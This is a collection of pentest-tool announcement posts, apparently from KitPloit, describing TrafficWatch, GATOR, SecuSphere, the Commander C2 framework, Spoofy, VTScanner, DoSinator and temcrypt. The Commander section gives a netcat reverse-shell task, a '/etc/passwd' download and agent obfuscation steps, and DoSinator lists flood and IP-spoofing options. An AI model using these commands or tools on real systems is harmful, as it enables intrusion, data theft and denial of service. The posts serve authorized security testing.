-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!"Β 



☐ β˜† βœ‡ KitPloit - PenTest Tools!

GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R β€” October 23rd 2023 at 17:45


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



☐ β˜† βœ‡ KitPloit - PenTest Tools!

SecuSphere - Efficient DevSecOps

By: Zion3R β€” October 21st 2023 at 11:30


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

ο’» Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Commander - A Command And Control (C2) Server

By: Zion3R β€” October 20th 2023 at 21:31


Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R β€” October 11th 2023 at 18:26



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

Β 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R β€” September 12th 2023 at 11:30

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R β€” September 5th 2023 at 22:42


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.Β 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

packets to send (default: 500). -ps PACKET_SIZE, --packet_size PACKET_SIZE Packet size in bytes (default: 64). -ar ATTACK_RATE, --attack_rate ATTACK_RATE Attack rate in packets per second (default: 10). -d DURATION, --duration DURATION Duration of the attack in seconds. -am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns} Attack mode (default: syn). -sp SPOOF_IP, --spoof-ip SPOOF_IP Spoof IP address. --data DATA Custom data string to send." dir="auto">
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Temcrypt - Evolutionary Encryption Framework Based On Scalable Complexity Over Time

By: Zion3R β€” August 31st 2023 at 12:30


The Next-gen Encryption

Try temcrypt on the Web β†’

temcrypt SDK

Focused on protecting highly sensitive data, temcrypt is an advanced multi-layer data evolutionary encryption mechanism that offers scalable complexity over time, and is resistant to common brute force attacks.

You can create your own applications, scripts and automations when deploying it.

Knowledge

Find out what temcrypt stands for, the features and inspiration that led me to create it and much more. READ THE KNOWLEDGE DOCUMENT. This is very important to you.


Compatibility

temcrypt is compatible with both Node.js v18 or major, and modern web browsers, allowing you to use it in various environments.

Getting Started

The only dependencies that temcrypt uses are crypto-js for handling encryption algorithms like AES-256, SHA-256 and some encoders and fs is used for file handling with Node.js

To use temcrypt, you need to have Node.js installed. Then, you can install temcrypt using npm:

npm install temcrypt

after that, import it in your code as follows:

const temcrypt = require("temcrypt");

Includes an auto-install feature for its dependencies, so you don't have to worry about installing them manually. Just run the temcrypt.js library and the dependencies will be installed automatically and then call it in your code, this was done to be portable:

node temcrypt.js

Alternatively, you can use temcrypt directly in the browser by including the following script tag:

<script src="temcrypt.js"></script>

or minified:

<script src="temcrypt.min.js"></script>

You can also call the library on your website or web application from a CDN:

<script src="https://cdn.jsdelivr.net/gh/jofpin/temcrypt/temcrypt.min.js"></script>

Usage

ENCRYPT & DECRYPT

temcrypt provides functions like encrypt and decrypt to securely protect and disclose your information.

Parameters

  • dataString (string): The string data to encrypt.
  • dataFiles (string): The file path to encrypt. Provide either dataString or dataFiles.
  • mainKey (string): The main key (private) for encryption.
  • extraBytes (number, optional): Additional bytes to add to the encryption. Is an optional parameter used in the temcrypt encryption process. It allows you to add extra bytes to the encrypted data, increasing the complexity of the encryption, which requires more processing power to decrypt. It also serves to make patterns lose by changing the weight of the encryption.

Returns

  • If successful:
    • status (boolean): true to indicate successful decryption.
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • dataString (string) or dataFiles: The decrypted string or the file path of the decrypted file, depending on the input.
    • updatedEncryptedData (string): The updated encrypted data after decryption. The updated encrypted data after decryption. Every time the encryption is decrypted, the output is updated, because the mainKey changes its order and the new date of last decryption is saved.
    • creationDate (string): The creation date of the encrypted data.
    • lastDecryptionDate (string): The date of the last successful decryption of the data.
  • If dataString is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key (private) used for encryption.
    • timeKey (string): The time key (private) of the encryption.
    • dataString (string): The encrypted string.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If dataFiles is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key used for encryption.
    • timeKey (string): The time key of the encryption.
    • dataFiles (string): The file path of the encrypted file.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If decryption fails:
    • status (boolean): false to indicate decryption failure.
    • error_code (number): An error code indicating the reason for decryption failure.
    • message (string): A descriptive error message explaining the decryption failure.

Here are some examples of how to use temcrypt. Please note that when encrypting, you must enter a key and save the hour and minute that you encrypted the information. To decrypt the information, you must use the same main key at the same hour and minute on subsequent days:

Encrypt a String

const dataToEncrypt = "Sensitive data";
const mainKey = "your_secret_key"; // Insert your custom key

const encryptedData = temcrypt.encrypt({
dataString: dataToEncrypt,
mainKey: mainKey
});

console.log(encryptedData);

Decrypt a String

const encryptedData = "..."; // Encrypted data obtained from the encryption process
const mainKey = "your_secret_key";

const decryptedData = temcrypt.decrypt({
dataString: encryptedData,
mainKey: mainKey
});

console.log(decryptedData);

Encrypt a File:

To encrypt a file using temcrypt, you can use the encrypt function with the dataFiles parameter. Here's an example of how to encrypt a file and obtain the encryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt";
const mainKey = "your_secret_key";

const result = temcrypt.encrypt({
dataFiles: filePath,
mainKey: mainKey,
extraBytes: 128 // Optional: Add 128 extra bytes
});

console.log(result);

In this example, replace 'test.txt' with the actual path to the file you want to encrypt and set 'your_secret_key' as the main key for the encryption. The result object will contain the encryption details, including the unique hash, main key, time key, and the file path of the encrypted file.

Decrypt a File:

To decrypt a file that was previously encrypted with temcrypt, you can use the decrypt function with the dataFiles parameter. Here's an example of how to decrypt a file and obtain the decryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt.trypt";
const mainKey = "your_secret_key";

const result = temcrypt.decrypt({
dataFiles: filePath,
mainKey: mainKey
});

console.log(result);

In this example, replace 'path/test.txt.trypt' with the actual path to the encrypted file, and set 'your_secret_key' as the main key for decryption. The result object will contain the decryption status and the decrypted data, if successful.

Remember to provide the correct main key used during encryption to successfully decrypt the file, at the exact same hour and minute that it was encrypted. If the main key is wrong or the file was tampered with or the time is wrong, the decryption status will be false and the decrypted data will not be available.


UTILS

temcrypt provides utils functions to perform additional operations beyond encryption and decryption. These utility functions are designed to enhance the functionality and usability.

Function List:

  1. changeKey: Change your encryption mainKey
  2. check: Check if the encryption belongs to temcrypt
  3. verify: Checks if a hash matches the legitimacy of the encrypted output.

Below, you can see the details and how to implement its uses.

Update MainKey:

The changeKey utility function allows you to change the mainKey used to encrypt the data while keeping the encrypted data intact. This is useful when you want to enhance the security of your encrypted data or update the mainKey periodically.

Parameters

  • dataFiles (optional): The path to the file that was encrypted using temcrypt.
  • dataString (optional): The encrypted string that was generated using temcrypt.
  • mainKey (string): The current mainKey used to encrypt the data.
  • newKey(string): The new mainKey that will replace the current mainKey.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const currentMainKey = "my_recent_secret_key";
const newMainKey = "new_recent_secret_key";

// Update mainKey for the encrypted file
const result = temcrypt.utils({
changeKey: {
dataFiles: filePath,
mainKey: currentMainKey,
newKey: newMainKey
}
});

console.log(result.message);

Check Data Integrity:

The check utility function allows you to verify the integrity of the data encrypted using temcrypt. It checks whether a file or a string is a valid temcrypt encrypted data.

Parameters

  • dataFiles (optional): The path to the file that you want to check.
  • dataString (optional): The encrypted string that you want to check.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const encryptedString = "..."; // Encrypted string generated by temcrypt

// Check the integrity of the encrypted File
const result = temcrypt.utils({
check: {
dataFiles: filePath
}
});

console.log(result.message);

// Check the integrity of the encrypted String
const result2 = temcrypt.utils({
check: {
dataString: encryptedString
}
});

console.log(result2.message);

Verify Hash:

The verify utility function allows you to verify the integrity of encrypted data using its hash value. Checks if the encrypted data output matches the provided hash value.

Parameters

  • hash (string): The hash value to verify against.
  • dataFiles (optional): The path to the file whose hash you want to verify.
  • dataString (optional): The encrypted string whose hash you want to verify.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const hashToVerify = "..."; // The hash value to verify

// Verify the hash of the encrypted File
const result = temcrypt.utils({
verify: {
hash: hashToVerify,
dataFiles: filePath
}
});

console.log(result.message);

// Verify the hash of the encrypted String
const result2 = temcrypt.utils({
verify: {
hash: hashToVerify,
dataString: encryptedString
}
});

console.log(result2.message);

Error Codes

The following table presents the important error codes and their corresponding error messages used by temcrypt to indicate various error scenarios.

Code Error Message Description
420 Decryption time limit exceeded The decryption process took longer than the allowed time limit.
444 Decryption failed The decryption process encountered an error.
777 No data provided No data was provided for the operation.
859 Invalid temcrypt encrypted string The provided string is not a valid temcrypt encrypted string.

Examples

Check out the examples directory for more detailed usage examples.

WARNING

The encryption size of a string or file should be less than 16 KB (kilobytes). If it's larger, you must have enough computational power to decrypt it. Otherwise, your personal computer will exceed the time required to find the correct main key combination and proper encryption formation, and it won't be able to decrypt the information.

TIPS

  1. With temcrypt you can only decrypt your information in later days with the key that you entered at the same hour and minute that you encrypted.
